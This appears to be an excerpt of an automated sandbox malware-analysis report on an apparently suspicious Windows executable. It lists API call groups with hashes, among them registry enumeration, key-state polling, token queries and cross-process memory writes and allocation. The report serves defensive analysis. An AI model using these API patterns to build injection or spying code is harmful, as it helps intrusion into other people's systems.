                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 0090C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090B6AE,?,?), ref: 0090C9B5
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090C9F1
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA68
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090BAA5
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090BB00
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0090BB63
                                      • RegCloseKey.ADVAPI32(?,?), ref: 0090BBA6
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090BBB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 826366716-0
                                      • Opcode ID: df18b877afdb7299d9dc51b37db583e138fcd6771b183d299315269abf65bd2c
                                      • Instruction ID: 42274e5a8ec4417dcd3e5cb94af18f1ff20c7ead78c019d35961fc7724330a17
                                      • Opcode Fuzzy Hash: df18b877afdb7299d9dc51b37db583e138fcd6771b183d299315269abf65bd2c
                                      • Instruction Fuzzy Hash: 8E618271208241EFD714DF54C490E6ABBE9FF84308F54895DF4998B2A2DB31ED45CB92
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 008E8BCD
                                      • VariantClear.OLEAUT32 ref: 008E8C3E
                                      • VariantClear.OLEAUT32 ref: 008E8C9D
                                      • VariantClear.OLEAUT32(?), ref: 008E8D10
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008E8D3B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      • Opcode ID: 50f6a7896ffe9ba71da1e0b2e83b73c51e90ae8e943e60aae46985f89f34f031
                                      • Instruction ID: 8742e53dc738a3d858bf3ceaa87e22ca074afae47975202e7031bd49804483ce
                                      • Opcode Fuzzy Hash: 50f6a7896ffe9ba71da1e0b2e83b73c51e90ae8e943e60aae46985f89f34f031
                                      • Instruction Fuzzy Hash: 455178B5A00659EFCB10CF69C884AAAB7F9FF8A314B158559F909DB350E730E911CF90
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008F8BAE
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 008F8BDA
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008F8C32
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008F8C57
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008F8C5F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      APIs
                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00908F40
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00908FD0
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00908FEC
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00909032
                                      • FreeLibrary.KERNEL32(00000000), ref: 00909052
                                        • Part of subcall function 0089F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,008F1043,?,7529E610), ref: 0089F6E6
                                        • Part of subcall function 0089F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,008DFA64,00000000,00000000,?,?,008F1043,?,7529E610,?,008DFA64), ref: 0089F70D
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                      • String ID:
                                      • API String ID: 666041331-0
                                      APIs
                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00916C33
                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00916C4A
                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00916C73
                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,008FAB79,00000000,00000000), ref: 00916C98
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00916CC7
                                      Similarity
                                      • API ID: Window$Long$MessageSendShow
                                      • String ID:
                                      • API String ID: 3688381893-0
                                      APIs
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00899141
                                      • ScreenToClient.USER32(00000000,?), ref: 0089915E
                                      • GetAsyncKeyState.USER32(00000001), ref: 00899183
                                      • GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      APIs
                                      • GetInputState.USER32 ref: 008F38CB
                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 008F3922
                                      • TranslateMessage.USER32(?), ref: 008F394B
                                      • DispatchMessageW.USER32(?), ref: 008F3955
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F3966
                                      Similarity
                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                      • String ID:
                                      • API String ID: 2256411358-0
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,008FC21E,00000000), ref: 008FCF38
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 008FCF6F
                                      • GetLastError.KERNEL32(?,00000000,?,?,?,008FC21E,00000000), ref: 008FCFB4
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,008FC21E,00000000), ref: 008FCFC8
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,008FC21E,00000000), ref: 008FCFF2
                                      Similarity
                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 3191363074-0
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 008E1915
                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 008E19C1
                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 008E19C9
                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 008E19DA
                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 008E19E2
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      APIs
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00915745
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0091579D
                                      • _wcslen.LIBCMT ref: 009157AF
                                      • _wcslen.LIBCMT ref: 009157BA
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00915816
                                      Similarity
                                      • API ID: MessageSend$_wcslen
                                      • String ID:
                                      • API String ID: 763830540-0
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00900951
                                      • GetForegroundWindow.USER32 ref: 00900968
                                      • GetDC.USER32(00000000), ref: 009009A4
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 009009B0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 009009E8
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 008BCDC6
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008BCDE9
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008BCE0F
                                      • _free.LIBCMT ref: 008BCE22
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008BCE31
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 008998CC
                                      • SetTextColor.GDI32(?,?), ref: 008998D6
                                      • SetBkMode.GDI32(?,00000001), ref: 008998E9
                                      • GetStockObject.GDI32(00000005), ref: 008998F1
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      Similarity
                                      • API ID: Color$LongModeObjectStockTextWindow
                                      • String ID:
                                      • API String ID: 1860813098-0
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00899693
                                      • SelectObject.GDI32(?,00000000), ref: 008996A2
                                      • BeginPath.GDI32(?), ref: 008996B9
                                      • SelectObject.GDI32(?,00000000), ref: 008996E2
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      APIs
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,008AF2DE,008B3863,00951444,?,0089FDF5,?,?,0088A976,00000010,00951440,008813FC,?,008813C6), ref: 008B2DFD
                                      • _free.LIBCMT ref: 008B2E32
                                      • _free.LIBCMT ref: 008B2E59
                                      • SetLastError.KERNEL32(00000000,00881129), ref: 008B2E66
                                      • SetLastError.KERNEL32(00000000,00881129), ref: 008B2E6F
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      APIs
                                      • CLSIDFromProgID.COMBASE ref: 008E002B
                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008E0046
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008DFF41,80070057,?,?), ref: 008E0054
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008E0064
                                      • CLSIDFromString.COMBASE(?,?), ref: 008E0070
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 008EE997
                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 008EE9A5
                                      • Sleep.KERNEL32(00000000), ref: 008EE9AD
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 008EE9B7
                                      • Sleep.KERNEL32 ref: 008EE9F3
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E1114
                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E1120
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E112F
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E1136
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E114D
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 883493501-0
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E0FCA
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E0FD6
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E0FE5
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008E0FEC
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E1002
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E102A
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E1036
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1045
                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008E104C
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1062
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      APIs
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0324
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0331
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F033E
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F034B
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0358
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0365
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      APIs
                                      • _free.LIBCMT ref: 008BD752
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BD764
                                      • _free.LIBCMT ref: 008BD776
                                      • _free.LIBCMT ref: 008BD788
                                      • _free.LIBCMT ref: 008BD79A
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 008E5C58
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 008E5C6F
                                      • MessageBeep.USER32(00000000), ref: 008E5C87
                                      • KillTimer.USER32(?,0000040A), ref: 008E5CA3
                                      • EndDialog.USER32(?,00000001), ref: 008E5CBD
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      APIs
                                      • _free.LIBCMT ref: 008B22BE
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008B22D0
                                      • _free.LIBCMT ref: 008B22E3
                                      • _free.LIBCMT ref: 008B22F4
                                      • _free.LIBCMT ref: 008B2305
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b0c9ff87da569c60488d0ca5a6914d3d98192d24089c04d1a3ba1364dbd0694f
                                      • Instruction ID: 094db9b7b112ca395bcb75fc37a46cd72ef30f22e4d289523c8d2f1140431dce
                                      • Opcode Fuzzy Hash: b0c9ff87da569c60488d0ca5a6914d3d98192d24089c04d1a3ba1364dbd0694f
                                      • Instruction Fuzzy Hash: 3BF0F4B54293109FC652AF59BC01E983F65F719752B050A06F818D6371C7310555BFE6
                                      APIs
                                      • EndPath.GDI32(?), ref: 008995D4
                                      • StrokeAndFillPath.GDI32(?,?,008D71F7,00000000,?,?,?), ref: 008995F0
                                      • SelectObject.GDI32(?,00000000), ref: 00899603
                                      • DeleteObject.GDI32 ref: 00899616
                                      • StrokePath.GDI32(?), ref: 00899631
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: e73b13ac8cbf16f8b3401d4065b0deca717b4abcfb9cc247f25d8b164361014a
                                      • Instruction ID: bee4a5ec1d1f31c6bfad2a53be1ffaa83be4d12818451adde1a9b22591861d4b
                                      • Opcode Fuzzy Hash: e73b13ac8cbf16f8b3401d4065b0deca717b4abcfb9cc247f25d8b164361014a
                                      • Instruction Fuzzy Hash: 75F0F67016D308EBDB126F6AFD287A93B61FB15363F088218E4A5950F0C7308991EF64
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008E187F
                                      • CloseHandle.KERNEL32(?), ref: 008E1894
                                      • CloseHandle.KERNEL32(?), ref: 008E189C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008E18A5
                                      • HeapFree.KERNEL32(00000000), ref: 008E18AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                      • String ID:
                                      • API String ID: 3751786701-0
                                      • Opcode ID: 7cb8e35eec3a947cfc24c5c257846f8c5574612d6318938ce1e8b57a4e4f5cf0
                                      • Instruction ID: 53fa4ed2106f68cbf4abde07d7bddfb58067d64d9481d39f548b18be04cdae87
                                      • Opcode Fuzzy Hash: 7cb8e35eec3a947cfc24c5c257846f8c5574612d6318938ce1e8b57a4e4f5cf0
                                      • Instruction Fuzzy Hash: A6E0EDB669C211BBD7015FA1ED0C985BF39FF49721750C220F22581070CB725421EF50
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: __freea$_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 3432400110-3206640213
                                      • Opcode ID: d37a70634484d706aff039986c77e9f2467fa5d58c2abdcddc2f446e03ff6600
                                      • Instruction ID: 357069228142d3a2a177b64138ce1e005bcbf63e61a85bda51c2303d2a0f8247
                                      • Opcode Fuzzy Hash: d37a70634484d706aff039986c77e9f2467fa5d58c2abdcddc2f446e03ff6600
                                      • Instruction Fuzzy Hash: 0AD1C13190020A9ADF249F68C86DAFABBB1FF09704FA84159E501DFB50E7799D81CB91
                                      APIs
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • _wcslen.LIBCMT ref: 008F9506
                                      • _wcslen.LIBCMT ref: 008F952D
                                      • 7516D1A0.COMDLG32(00000058), ref: 008F9585
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$7516
                                      • String ID: X
                                      • API String ID: 252919825-3081909835
                                      • Opcode ID: 038ad818f3b251deeac63ab0c2d5a018f9c761eec5783c84a81cedf3768db0e4
                                      • Instruction ID: a75c0a0f043c24e44913911e412ef62bac7329ade80fefc09aa83650b303e98c
                                      • Opcode Fuzzy Hash: 038ad818f3b251deeac63ab0c2d5a018f9c761eec5783c84a81cedf3768db0e4
                                      • Instruction Fuzzy Hash: F6E181715083058FD724EF28C881B6AB7E4FF85314F14856DE999DB2A2DB31ED05CB92
                                      APIs
                                        • Part of subcall function 008A0242: RtlEnterCriticalSection.NTDLL(0095070C), ref: 008A024D
                                        • Part of subcall function 008A0242: RtlLeaveCriticalSection.NTDLL(0095070C), ref: 008A028A
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008A00A3: __onexit.LIBCMT ref: 008A00A9
                                      • __Init_thread_footer.LIBCMT ref: 00907BFB
                                        • Part of subcall function 008A01F8: RtlEnterCriticalSection.NTDLL(0095070C), ref: 008A0202
                                        • Part of subcall function 008A01F8: RtlLeaveCriticalSection.NTDLL(0095070C), ref: 008A0235
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                      • String ID: 5$G$Variable must be of type 'Object'.
                                      • API String ID: 535116098-3733170431
                                      • Opcode ID: f4b8a98c5530680f88b6bd58af64dcda697a7bf9680fc004aecb23bac93d1965
                                      • Instruction ID: 72aeb5441c1d2cd46e35cba68fa043e6fbea041c68f39476d237e1ae2ea6ebbf
                                      • Opcode Fuzzy Hash: f4b8a98c5530680f88b6bd58af64dcda697a7bf9680fc004aecb23bac93d1965
                                      • Instruction Fuzzy Hash: B9919A70A04209EFCB14EF98D8819BEB7B5FF49310F148459F846AB2D2DB71AE81CB51
                                      APIs
                                        • Part of subcall function 008EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E21D0,?,?,00000034,00000800,?,00000034), ref: 008EB42D
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008E2760
                                        • Part of subcall function 008EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 008EB3F8
                                        • Part of subcall function 008EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 008EB355
                                        • Part of subcall function 008EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008E2194,00000034,?,?,00001004,00000000,00000000), ref: 008EB365
                                        • Part of subcall function 008EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008E2194,00000034,?,?,00001004,00000000,00000000), ref: 008EB37B
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E27CD
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E281A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
